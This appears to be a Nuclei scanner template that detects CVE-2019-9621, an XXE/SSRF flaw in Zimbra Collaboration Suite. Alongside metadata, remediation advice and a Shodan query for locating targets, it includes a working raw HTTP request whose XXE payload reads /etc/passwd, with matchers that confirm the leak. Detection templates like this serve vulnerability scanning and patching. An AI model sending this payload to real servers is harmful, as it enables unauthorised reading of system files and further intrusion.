id: CVE-2019-9621

info:
  name: Zimbra Collaboration Suite - SSRF
  author: riteshs4hu
  severity: high
  description: |
    Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows SSRF via the ProxyServlet component.
  impact: |
    Attackers can perform SSRF, potentially leading to internal network access or further exploitation.
  remediation: |
    Update to the latest patched versions: 8.6 patch 13, 8.7.11 patch 10, 8.8.10 patch 7, or 8.8.11 patch 3 or later.
  reference:
    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/zimbra_xxe_rce.rb
    - https://nvd.nist.gov/vuln/detail/cve-2019-9621
    - http://packetstormsecurity.com/files/153190/Zimbra-XML-Injection-Server-Side-Request-Forgery.html
    - https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html
    - https://bugzilla.zimbra.com/show_bug.cgi?id=109127
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-9621
    cwe-id: CWE-918
    epss-score: 0.94113
    epss-percentile: 0.99914
    cpe: cpe:2.3:a:zimbra:collaboration_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: zimbra
    product: collaboration_server
    shodan-query: html:"Zimbra Collaboration Suite Web Client"
  tags: cve,cve2019,zimbra,collaboration-server,oast,oob,xxe,kev,vkev,vuln

http:
  - raw:
      - |
        POST /autodiscover HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0"?>
        <!DOCTYPE soap [
        <!ELEMENT soap ANY >
        <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
        <Autodiscover>
          <Request>
            <EMailAddress>test@example.com</EMailAddress>
            <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
          </Request>
        </Autodiscover>

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - contains(body, "response schema")
          - contains(header, "text/html")
        condition: and
# digest: 4b0a00483046022100ab485a68d46fa81588e2092a0b0e06755356454fb252513b2002c85fc52283e8022100dec34daf3382ecb24fce39bfbabe48b68541ffb6cbde23f2d96af7aa7631dd84:922c64590222798bb761d5b6d8e72950